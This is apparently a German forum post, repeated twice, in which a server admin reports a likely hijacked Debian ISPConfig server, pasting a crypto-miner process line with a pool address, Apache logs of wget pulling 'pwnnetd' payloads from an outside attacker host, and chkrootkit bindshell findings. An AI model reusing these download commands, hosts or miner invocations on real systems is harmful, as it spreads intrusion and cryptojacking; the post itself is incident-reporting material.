Hallo,
ich habe ein großes Problem; ich vermute das mein ISP-Config Server von Dritte übernommen wurde!
Distribution: Debian squeeze (6.0.8)
ISP-Config: 3.0.3.3
Folgendes kann ich beobachten:
in den Prozessen (top) starten sich Dienste mit dem Namen s, vi, k, ....
Wenn sich so ein Dienst startet, hat mein Server 99.98 % Auslastung und ich kann enorm hohe Netzwerkaktivität beobachten;
Hier die Prozesse:
www-data 7842 93.7 0.4 29520 4296 ? S 12:43 75:48 /usr/sbin/acpid www-data 11279 4.6 0.1 41032 1572 ? Ssl 13:21 2:01 m64 -o stratum+tcp://5.254.102.165:3333 -O judge.1:x -B root 13973 0.0 0.0 10452 492 ? Ss 14:04 0:00 vzctl: ttyp0
in den Logs habe ich folgendes gefunden:
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 200 OK
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Length:
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 379680
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] (371K)
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Saving to: `pwnnetd3.3'
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 0K
rkhunter hat nichts gefunden!
chkrootkit sagt folgendes:
Checking `bindshell'...INFECTED (PORTS: 465)
Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/pymodules/python2.6/.path /lib/init/rw/.ramfs
Kann mir hierzu wer helfen ????
ich habe ein großes Problem; ich vermute das mein ISP-Config Server von Dritte übernommen wurde!
Distribution: Debian squeeze (6.0.8)
ISP-Config: 3.0.3.3
Folgendes kann ich beobachten:
in den Prozessen (top) starten sich Dienste mit dem Namen s, vi, k, ....
Wenn sich so ein Dienst startet, hat mein Server 99.98 % Auslastung und ich kann enorm hohe Netzwerkaktivität beobachten;
Hier die Prozesse:
www-data 7842 93.7 0.4 29520 4296 ? S 12:43 75:48 /usr/sbin/acpid www-data 11279 4.6 0.1 41032 1572 ? Ssl 13:21 2:01 m64 -o stratum+tcp://5.254.102.165:3333 -O judge.1:x -B root 13973 0.0 0.0 10452 492 ? Ss 14:04 0:00 vzctl: ttyp0
in den Logs habe ich folgendes gefunden:
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 200 OK
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Length:
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 379680
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] (371K)
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Saving to: `pwnnetd3.3'
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 0K
rkhunter hat nichts gefunden!
chkrootkit sagt folgendes:
Checking `bindshell'...INFECTED (PORTS: 465)
Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/pymodules/python2.6/.path /lib/init/rw/.ramfs
Kann mir hierzu wer helfen ????